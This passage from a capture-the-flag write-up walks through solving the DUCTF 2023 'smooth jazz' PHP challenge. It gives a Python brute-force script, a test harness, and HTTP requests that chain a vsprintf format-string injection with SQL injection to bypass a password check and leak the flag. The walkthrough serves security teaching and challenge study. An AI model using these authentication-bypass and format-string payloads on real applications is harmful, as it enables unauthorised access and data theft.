#3 {main}
  thrown in /pwd/jazz-data-pipeline.php on line 9

We get an error. This is because vsprintf() has been given a format string with two format string conversion specifications:

SELECT * FROM users WHERE username = "admin🔥 %s" AND password = "%s"
                                       one ───┘            two ───┘

But it has been given a values array with only one element:

["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]

vsprintf() can’t deal with this. When it sees the first %s it consumes an item (the only item) from the values array, and then when it sees the second %s, it notices that the values array has been exhausted and it cracks it, throwing an exception.

Our way forward is through the complex grammar regarding format string conversion specifications. Things can get a lot more complicated than simply %n where n is a format string specifier. The documentation shows that a format string conversion specification can look as wild as:

%[argnum$][flags][width][.precision]specifier

The feature of this grammar that is most immediately useful to us is the argnum part. Taking for example %n$m, where n is a number and m is a specifier, this is taken to mean “take the n‘th element from the values array (as opposed to the next element) and format is using the m specifier”. For example, while %s takes the next string from the values array and uses it as a string, %1$s explicitly takes the first item from the values array using it as a string, and %1337$s takes the 1337th item from the values array and uses it as a string.

Regarding our error, we can’t cause there to be more than one item in the values array. But what we can do is use the %n$m pattern to have our injected format string conversion specification explicitly take the first item from the values array, rather than the next one. “First item” and “next item” happen to be the same (only) item in this case, but what’s interesting about a format string string conversion specification being explicit about which item it wants from the values array is that it doesn’t cause the array cursor to be incremented. By explicitly asking for the first item from the array, we’re effectively leaving the item there for the second format string conversion specification to be able to grab!

For example:

php > print_r(vsprintf('Next item: %s, next item: %s',
                       array("one", "two")));
Next item: one, next item: two

php > print_r(vsprintf('Explicitly the first item: %1$s, next item: %s',
                       array("one", "two")));
Explicitly the first item: one, next item: one

Giving this a go, we get:

# php jazz-data-pipeline.php $'admin\x80 %1$s' password
username: admin🔥 %1$s
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd %1$s"]
result: SELECT * FROM users WHERE username = "admin🔥 %1$s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥 %1$s"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥 %1$s"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users
    WHERE username = "admin🔥 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

We’ve managed to borrow the computed SHA1 hash of the password value and have it appear within the admin’s username:

SELECT *
FROM users
WHERE username = "admin🔥 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

Neat!

But how can it get us closer to bypassing the password check using, say, SQL injection?

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is another opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you use this format string injection to smuggle an unescaped " into the username part of the SQL query, achieving SQL injection? You’re going to need to use something other than the %s specifier to do this. Make sure you RTFM.

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

Type juggling a hexadecimal string into an integer and then into a %c character

What we can do is use %c rather than %s, so that rather than bringing the entire SHA1 hash of the password into the username part of the query, we coerce it into some kind of single character on its way in. Given the right strategy, perhaps we could make that single character become ", giving us SQL injection?

PHP’s vsprintf() documentation says:

Specifier Description
c The argument is treated as an integer and presented as the character with that ASCII.

And so we can see that %c takes an integer parameter, and presents it as the ASCII character with the corresponding character code.

For example:

php > print_r(vsprintf("%c", array(0x41)));
A

The problem is, the only value in the parameters array of our vsprintf() call is a SHA1 hash represented as a string. It’s not an integer. And so we shouldn’t be able to use %c to borrow the SHA1 hash and have it give us a single %c character within the username part of the query.

php > print_r(vsprintf("%c", array("AAAA")));
php > print_r(vsprintf("%c", array("ABCD")));
php > print_r(vsprintf("%c", array("1337BEEF")));
9

Hold up. What’s happened here? The string “1337BEEF”, when used as a parameter for a c specifier, gave us the character “9”? How is it getting an integer value from “1337BEEF” and how is it then getting the ASCII character “9” from this integer?

php > print_r((int)"1337");
1337
php > print_r((int)"1337BEEF");
1337

Hmm. When PHP wants to squeeze an integer value out of the string “1337BEEF” (remember, %c takes its value as an integer) it’s using type juggling to do a best-effort translation of the string into an integer value. It juggles “1337” to 1337 which makes sense, but “1337BEEF” also becomes 1337. It seems as though as soon as PHP hits a non-numeric character, it says to itself “Well I suppose what we’ve found so far will have to do”.

Going back to our vsprintf() which turns 1337BEEF into a character:

php > print_r(vsprintf("%c", array("1337BEEF")));
9

Or alternatively:

php > print_r(vsprintf("%c", array(1337)));
9

How is it getting the character “9” from the integer 1337?

Heading to the PHP interpreter source code, we can see that in the case of the c format specifier, php_formatted_print() explicitly casts the given integer to a C char:

(char) zval_get_long(tmp)

This has the effect of essentially doing a mod 256 on the given integer. Python tells us that indeed, 1337 mod 256 is the ASCII character code for “9”:

>>> 1337 % 256
57
>>> chr(1337 % 256)
'9'

And so we need to find a password value which, when hashed with SHA1, has some leading numeric characters followed by a non-numeric character. Those numeric characters, when taken as a decimal number and reduced mod 256, need to have a value equal to the character code of ". We should then be able borrow that value using %c and smuggle a double quote into our username. This double quote won’t be affected by the strtr() that was done to our $username since our username itself only contains a %c format string conversion specification. And thus we can achieve SQL Injection. Right?

A challenge

STOP SCROLLING

If you haven’t solved the challenge yet, this is another challenge opportunity.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you find a value which, when hashed with SHA1, fits the criteria to be able to be borrowed as a " using vsprintf()? Can you turn this into an SQL injection payload which bypasses the password authentication?

Hints (Hover to reveal):

  • When I’m seeking a value that hashes to a value that matches some criteria, I usually choose to script it up as a brute force search
  • I find that the easiest way to do this is to use Python, and to count upwards forever starting from 0. At each stage, hash the number as though it was a string, and see if it fits the criteria I’m seeking. If it does I’ve found a solution! Do this, find the magic character, and use it to achieve SQL injection which bypasses the password check.

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

The search

We wrote a small Python script to brute force an input string that satisfies our criteria:

#!/usr/bin/env python3
import itertools
import hashlib
import re


for i in itertools.count():
    v = str(i)
    h = hashlib.sha1(v.encode()).hexdigest()
    match = re.match(r"^(\d+)[^0-9]", h)
    if match:
        leading_digits = match.group(1)
        n = int(leading_digits)
        if n % 256 == ord('"'):
            print(f"Input: {v!r}")
            print(f"SHA1: {h}")
            break
% ./find_string.py
Input: '668'
SHA1: 34c66477519b949b09b45e131347c17b5822a30a

The string value “668” has a SHA1 hash which begins with the number 34, which is precisely the ASCII value of ".

Giving a username that contains the %1$c format string conversion specification, and a password of “668”, we get our " and thus our SQL injection!

(Note that I’ve added some commentary to the below output)

# php jazz-data-pipeline.php $'admin\x80%1$c OR 1=1;-- -' 668
username: admin🔥%1$c OR 1=1;-- -
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c OR 1=1;-- -"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c OR 1=1;-- -"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c OR 1=1;-- -"
                                      \_____________________/
                     all one string ───┘

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c OR 1=1;-- -"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥" OR 1=1;-- -" AND password = "34c66477519b949b09b45e131347c17b5822a30a"
                      \______/\_____/\______________________________________________________________/
            a string ───┘      |      |
             sql injection! ───┘      |
                           ignored ───┘

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥" OR 1=1;-- -" AND password = "34c66477519b949b09b45e131347c17b5822a30a"
SELECT *
FROM users
WHERE username = "admin\x80" OR 1=1;-- -" AND password = "34c66477519b949b09b45e131347c17b5822a30a"
--                         └──── Double quote created by our %1$c

🥳

Sending this to the challenge confirms our achievement:

POST / HTTP/1.1
[... SNIP ...]

username=admin%80%1$c+OR+1=1;--+-&password=668
HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Hello admin�ç OR 1=1;-- -, the server time is 2023-09-04 07:17:57
[... SNIP ...]

We’ve made it past the username check, and the username/password check.

We don’t even need the OR 1=1 bit. But note that we do still need for our username to begin with “admin” followed immediately by our magic truncating character, as even with this SQL injection technique for the second SQL query, we still need to satisfy the first query that was checking to see that our user seems to exist.

At this stage, the space after the SQL comment is up for grabs if we need to include any additional content.

Tidying the payload up and making use of this space gives us:

# php jazz-data-pipeline.php $'admin\x80%1$c;-- its free real estate' 668
username: admin🔥%1$c;-- its free real estate
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- its free real estate"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c;-- its free real estate"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate" AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate" AND password = "34c66477519b949b09b45e131347c17b5822a30a"
POST / HTTP/1.1
[... SNIP ...]

username=admin%80%1$c;--+its+free+real+estate&password=668
HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Hello admin�ç;-- its free real estate, the server time is 2023-09-04 07:24:12
[... SNIP ...]

The final part - leaking the flag

So we can successfully authenticate as the admin user, with no need to know their unknowable and uncrackable password. All that’s left is to use our access to obtain the flag (he says optimistically).

After the password check, the final part of the code is as follows:

  $htmlsafe_username = htmlspecialchars($username,
                                        ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin" 
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);
  
  fail:
}

Once the password check is satisfied, the code does the following:

  • It uses htmlspecialchars() to HTML-encode the given username using the ENT_COMPAT and ENT_SUBSTITUTE options
  • It prepares to print a greeting message that tells us the current server time. If our username was strictly equal to the string “admin”, this message also includes the flag from the environment.

We’re so close.

Regarding the options given to htmlspecialchars(), the documentation tells us that the default options are:

  • ENT_QUOTES - Will convert both double and single quotes.
  • ENT_SUBSTITUTE - Replace invalid code unit sequences with a Unicode Replacement Character U+FFFD (UTF-8) or &#xFFFD; (otherwise) instead of returning an empty string.
  • ENT_HTML401 - Handle code as HTML 4.01

While the options used in the challenge are:

  • ENT_COMPAT - Will convert double-quotes and leave single-quotes alone
  • ENT_SUBSTITUTE - Replace invalid code unit sequences with a Unicode Replacement Character U+FFFD (UTF-8) or &#xFFFD; (otherwise) instead of returning an empty string.

The key differences are that hashkitten has decided to have htmlspecialchars() not transform single quotes, only double quotes. He also decided to omit the directive to “handle code as HTML 4.01”. It can be useful to pay attention to details such as this, as any change to default behaviours could have been to avoid a situation that makes the challenge unsolvable. One of these changes was indeed necessary for the challenge to be solvable.

Regarding the greeting message that is printed, we can take the code:

$greeting = $username === "admin" 
    ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
    : "Hello $htmlsafe_username, the server time is %s";

$message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

And rewrite it in a more verbose fashion as follows:

if ($username === "admin") {
    $message = vsprintf("Hello $htmlsafe_username, the server time is %s and the flag is %s",
                        [date('Y-m-d H:i:s'), getenv('FLAG')]);
} else {
    $message = vsprintf("Hello $htmlsafe_username, the server time is %s",
                        [date('Y-m-d H:i:s'), getenv('FLAG')]);
}

In both cases, vsprintf() is being used to prepare the message, and in both cases, the parameters array has two items in it - the current datetime, and the value of the flag. However, only in the case that the user’s given username is strictly equal to (===) the string “admin” is there a format string that provides for the opportunity for both parameters to actually be used.

Seeing as to get to this point we need to have our username contain at least:

  • A %1$c format string conversion specification, to be able to achieve SQL injection; and thus
  • A character above or equal to \x80 to hide the format string conversion specification from the username check

Then there is absolutely no way that our given username could be strictly equal to the string “admin”.

And so we can cut out the $username === "admin" case, and simplify the remaining step in the challenge code to be:

$message = vsprintf("Hello $htmlsafe_username, the server time is %s",
                    [date('Y-m-d H:i:s'), getenv('FLAG')]);

And we can update our harness as such:

<?php
function my_vsprintf($format, $values) {
  // Perform vsprintf() on a given format string and values array
  // Show our work as we go
  print_r("[+] vsprintf()\n");
    print_r("format string: $format\n");
    // Use json_encode() to get the array in one neat line.
    // Tell it to be prepared for the invalid UTF8 sequence.
    print_r("values: " . 
                json_encode($values, JSON_INVALID_UTF8_SUBSTITUTE) .
                "\n");
    $res = vsprintf($format, $values);
    print_r("result: $res\n\n");
    return $res;
}

function mysql_fquery($query, $params) {
    // Construct the SQL query and pretend to execute it
    $prepared_query = my_vsprintf($query, $params);
    print_r("[+] Do SQL Query\n");
    print_r($prepared_query . "\n\n");
    // We don't need to do the query, we're just monitoring the data flow
    //return mysqli_query($mysqli, $q);
}

// Get the username, escape its double quotes and backslashes
$username = $argv[1];
$username = strtr($username, ['"' => '\\"', '\\' => '\\\\']);
print_r("username: $username\n");

// Get the password, SHA1 it
$password = $argv[2];
$password = sha1($password);
print_r("password: $password\n\n");

mysql_fquery('SELECT * FROM users WHERE username = "%s"', [$username]);

// Stop if the username doesn't match our criteria:
//  * 'admi'   == bad
//  * 'admin'  == good
//  * 'adminX' == good if and only if X is a character >= 0x80
if (strpos($username, "admin") !== 0) {
  die("bad username!\n");
}
if (strlen($username) > 5 && ord(substr($username, 5, 1)) < 0x80) {
  die("bad username!\n");
}
mysql_fquery('SELECT * FROM users WHERE username = "'.$username.'" ' .
                 'AND password = "%s"', [$password]);

$htmlsafe_username = htmlspecialchars($username,
                                      ENT_COMPAT | ENT_SUBSTITUTE);
my_vsprintf("Hello $htmlsafe_username, the server time is %s",
            [date('Y-m-d H:i:s'), "DUCTF{dummy}"]);

This harness now simulates the entirety of the challenge (besides actually performing the SQL queries):

# php jazz-data-pipeline-full.php $'admin\x80%1$c;-- its free real estate' 668
username: admin🔥%1$c;-- its free real estate
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- its free real estate"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c;-- its free real estate"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] vsprintf()
format string: Hello admin�%1$c;-- its free real estate, the server time is %s
values: ["2023-09-10 02:48:43","DUCTF{dummy}"]
result: Hello admin�;-- its free real estate, the server time is 2023-09-10 02:48:43

The final call to vsprintf() results in a string that matches the output we’re currently getting from the webapp, and so we can grind away at this harness until a flag falls out 🤞

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is an opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: How do you suppose we could trick this last chunk of code into baking a $message that includes the flag? What challenges might we have with this strategy?

Hints (Hover to reveal):

  • The code uses a ternary condition as bit of code shorthand. The problem with this is that it’s only switching up the format string based on the value of $username. It’s not doing anything to the format string parameters. In the case of a $username of not strictly equal to “admin”, the format string parameters will contain an unused copy of the flag! Could this be interesting?
  • How could we cause the unused copy of the flag to become used? Give it a go. You should get an error, and the challenge we’ll be facing should become apparent 🙂

If you’re up for it, see if you can finish the challenge completely before you read on. This part was the crux of the challenge IMO. It took some lateral thinking, some trial and error, and probably some luck for us to see it pop off. If you’re keen to give it a go, good luck, and I’ll see you on the other side!

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

Please sir, I want some more (format string conversion specifications)

It’s important to note that the final call to vsprintf() will always have the flag passed in as the second item in the values. The thing is, when our username is not “admin”, it goes completely unused:

$message = vsprintf("Hello $htmlsafe_username, the server time is %s",
                    [date('Y-m-d H:i:s'), getenv('FLAG')])
//                   └──── Used 😁        └──── Unused 😔

However, we mostly control $html_username. It’s a HTML-encoded copy of our username! Our username looks like this right now:

admin🔥%1$c;-- its free real estate

And so what if we added a %s within it. We’d have our %1$c which will take the date parameter as a character, then we’d have our own %s which would “consume” the date parameter, then the final %s (in the message template) would give us our flag!

It would look something like this:

//                   /------ username -------\
$message = vsprintf('Hello admin\x80%1$c;-- %s, the server time is %s',
//                         takes the date ──┘    takes the flag? ──┘
                    [date('Y-m-d H:i:s'), getenv('FLAG')])

Giving us:

php > print_r(vsprintf('Hello admin\x80%1$c;-- %s, the server time is %s',
                       [date('Y-m-d H:i:s'), "DUCTF{the_flag}"]));
Hello admin\x80;-- 2023-09-10 03:07:49, the server time is DUCTF{the_flag}

Looks like a reasonable strategy to me!

Being bold and sending it to straight the server gives us:

POST / HTTP/1.1
[... SNIP ...]

username=admin%80%1$c;--+%s&password=668
HTTP/1.0 500 Internal Server Error
[... SNIP ...]

Dang it.

Looking at our PHP error logs, we see:

web    | [Wed Sep 06 15:00:23.855962 2023] [php:error] [pid 21]
  [client 172.31.0.1:46430] PHP Fatal error:  Uncaught ValueError:
  The arguments array must contain 2 items, 1 given in
  /var/www/html/index.php:3\nStack trace:\n#0/var/www/html/index.php(3):
  vsprintf()\n#1 /var/www/html/index.php(16): mysql_fquery()\n#2
  {main}\n  thrown in /var/www/html/index.php on line 3,
  referer: http://172.31.0.3/

Hmm. Error on line 3, as called by line 16. Line 16 is:

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username.'" ' .
                        'AND password = "%s"',
                    [$password]);

Looks like sneaking in an extra %s has blown the preparation of the username/password query.

This is also the case if we run this in the context of our command-line harness:

# php ./jazz-data-pipeline-full.php $'admin\x80%1$c;-- %s' 668
username: admin🔥%1$c;-- %s
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- %s"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- %s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- %s"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c;-- %s"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]

Fatal error: Uncaught ValueError: The arguments array must contain
2 items, 1 given in /pwd/jazz-data-pipeline-full.php:9
Stack trace:
#0 /pwd/jazz-data-pipeline-full.php(9): vsprintf('SELECT * FROM u...', Array)
#1 /pwd/jazz-data-pipeline-full.php(16): my_vsprintf('SELECT * FROM u...', Array)
#2 /pwd/jazz-data-pipeline-full.php(45): mysql_fquery('SELECT * FROM u...', Array)
#3 {main}
  thrown in /pwd/jazz-data-pipeline-full.php on line 9

And so while (in theory) this username string is going to let us win upon the generation of the greeting message, we get an earlier blow-up due to vsprintf() being given more format string conversion specifications than can be provided by the values array:

vsprintf('SELECT * FROM users WHERE username = "admin🔥%1$c;-- %s" ' .
             'AND password = "%s"',
         ["34c66477519b949b09b45e131347c17b5822a30a"]);

And so it seemed to us that we would need to find a way to cook our %s so that:

  • It’s “hidden” at the time of this earlier username/password SQL query; and
  • Once htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE) gets done, the string is modified in a way to make the %s come to life

A final opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this the final opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you craft the %s in such a way that it’s “hidden” at the time of the username and password SQL query avoiding the blow-up, but so that it springs forth once the htmlspecialchars() is done?

Here are some hints. No spoiler tags this time, this part was tough.

  • What is unique about the options being given to htmlspecialchars()?
  • RTFM

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

The prestige

To be frank, the solution came to us amidst a lot of guessing and wrong ideas. We knew that we needed to have a %s that only becomes apparent once the HTML encoding gets done on our username. Given that, we threw a lot of things from the vsprintf() documentation at the problem, interspersed with things that would change during HTML encoding, until something stuck.

After a lot of (semi-educated) trial and error, what ended up working was:

admin\x80;-- %1$'>%s

But why?

Keep in mind we have two objectives.

The first is for the following to not blow up:

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username.'" ' .
                        'AND password = "%s"',
                    [$password]);

That is, after $username is smashed directly into the format string, we need for there to be no expectation that the values array has more than one element in it.

It can be shown that the winning input satisfies this objective.

At first glance our username appears to contain a %s. This %s, given there is already a %s in the format string, should cause a blow-up. The thing is, the %s in our username isn’t actually a %s!

This is the key part:

%1$'>%s
└─ ? │
     └──── should cause a blow-up?

According to the grammar of format string conversion specifications, this is broken down in the following way:

[+] %1$'>%
%  - start of format string conversion specification
1$ - argnum    - take from the first item in the values array
'> - flags     - use the > character as a padding character
%  - specifier - literal '%'

[+] s
Trailing junk

This means that the trailing s is not actually part of the format string conversion specification!

At its most minimal, this cursed format string specification behaves in the following way:

php > print_r(vsprintf('%1$\'>% %s', ["Hello, world!"]));
% Hello, world!

See? It is emitted as a literal % character in the output string!

What is surprising to me is that the 1$ is still needed:

php > print_r(vsprintf('%\'>% %s', ["Hello, world!"]));

Warning: Uncaught ValueError: The arguments array must contain
2 items, 1 given in php shell code:1
Stack trace:
#0 php shell code(1): vsprintf('%'>% %s', Array)
#1 {main}
  thrown in php shell code on line 1

Without it, the attempt to print a literal % seems to still consume one of the items in the values array, leaving nothing for the trailing %s.

This doesn’t happen, however, if you omit the padding directive:

php > print_r(vsprintf('%% %s', ["Hello, world!"]));
% Hello, world!

This inconsistency just doesn’t make sense to me. Why does %'x% (where x is a padding character) eat something out of the values array when emitting plain old %, but %% doesn’t eat a value? We can make them equivalently hungry by considering %% vs. %n$'x% (where n is a number that is less than or equal to the length of the values array) but it feels to me like we shouldn’t have to.

Perhaps I’m completely misunderstanding the way in which %1$\'>% is being parsed as a conversion specification 😅

Begin sidequest

This was bothering me, so I sent hashkitten a lazy ping to see if he could spot my error.

He said:

I looked at the PHP source code to construct this problem. And the formatting is handled by the php_formatted_print function. But in fact, a double percent is handled in two places:

Here is the first place. it is a shortcut for %% only and doesn’t increment the arg counter.

Here is the second place. This happens after consuming padding, etc. and it consumes an arg.

This is probably a bug in PHP, not sure though 🙂

And so I’m not crazy! But PHP might be.

End sidequest

Regardless, %1$\'>%s %s is satisfactory to vsprintf() when given an items array of length 1, and that gets us past the blow-up.

Moving on, the second objective for our input is for it to cause the following to leak the flag:

$htmlsafe_username = htmlspecialchars($username,
                                      ENT_COMPAT | ENT_SUBSTITUTE);
$greeting = $username === "admin" 
    ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
    : "Hello $htmlsafe_username, the server time is %s";

$message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

That is, after $username is HTML encoded (and given ENT_COMPAT we note that single quotes will survive the encoding), the format string needs to contain sufficient format string conversion specifications to cause the second item in the values array to be interpolated into $message as a string.

It can be shown that our input also causes this to occur:

php > $cursed = '%1$\'>%s';

php > $cursed_encoded = htmlspecialchars($cursed,
                                         ENT_COMPAT | ENT_SUBSTITUTE);

php > print_r($cursed_encoded);
%1$'&gt;%s

php > print_r(vsprintf($cursed_encoded . ' %s',
                       ["Hello, world!", "DUCTF{a flag}"]));
0t;Hello, world! DUCTF{a flag}

The HTML encoding has transformed our cursed format string conversion specification as follows:

plain:   %1$'>%s
encoded: %1$'&gt;%s

It has effectively “widened” our > to become &gt;

This means that our input, when HTML-encoded, now contains two different format string conversion specifications!

[+] %1$'&g
%  - start of format string conversion specification
1$ - argnum    - take from the first item in the values array
'& - flags     - use the & character as a padding character
g  - specifier - general format

[+] t;
Plain old data

[+] %s
A humble %s format string conversion specification

The first conversion specification is uninteresting - it explicitly takes the first element from the values array, pads it with &, and interpolates it using the “general format”.

The second conversion specification is very interesting. It takes the next element from the values array, interpolates it as a string, and increments the values cursor by one.

This means that when vsprintf() gets to the trailing %s that naturally comes within the larger format string template into which our encoded username is being smashed, it interpolates the next item from the array as a string. This is our flag! 🥳

Running this username through the harness looks promising:

# php ./jazz-data-pipeline-full.php $'admin\x80%1$c;-- %1$\'>%s' 668
username: admin🔥%1$c;-- %1$'>%s
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- %1$'>%s"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- %1$'>%s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- %1$'>%s"

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "admin🔥%1$c;-- %1$'>%s" AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥";-- %s"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥";-- %s"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] vsprintf()
format string: Hello admin�%1$c;-- %1$'&gt;%s, the server time is %s
values: ["2023-09-10 03:24:37","DUCTF{dummy}"]
result: Hello admin�;-- 2023t;2023-09-10 03:24:37, the server time is DUCTF{dummy}

Running it against our local copy of the challenge gives us our dummy flag:

POST / HTTP/1.1
[... SNIP ...]

username=admin%80%251$c;--+%251$'>%25s&password=668
HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
<p>Hello admin�ç;-- 2023t;2023-09-07 02:19:22,
the server time is DUCTF{dummy}</p>
[... SNIP ...]

And running it against the challenge server gives us the real flag:

POST / HTTP/2
Host: web-smooth-jazz-3a2c947be0c6.2023.ductf.dev
[... SNIP ...]

username=admin%80%251$c;--+%251$'>%25s&password=668
HTTP/2 200 OK
[... SNIP ...]

[... SNIP ...]
<p>Hello admin�ç;-- 2023t;2023-09-07 02:21:54,
the server time is DUCTF{at_least_you_can_enjoy_the_jazz}</p>
[... SNIP ...]

🎉

EOF

If you’ve made it this far, thank you for reading. I hope you enjoyed the challenge and learned as much as we did while solving it!

What I love about hashkitten’s challenges is they are often multi-step. They involve threading multiple separate needles at once, and you need to be careful when threading subsequent ones to not unthread a prior one. This year’s DUCTF was another banger event, and I can’t recommend highly enough that you keep an eye out for next year’s.

Cheers!

Justin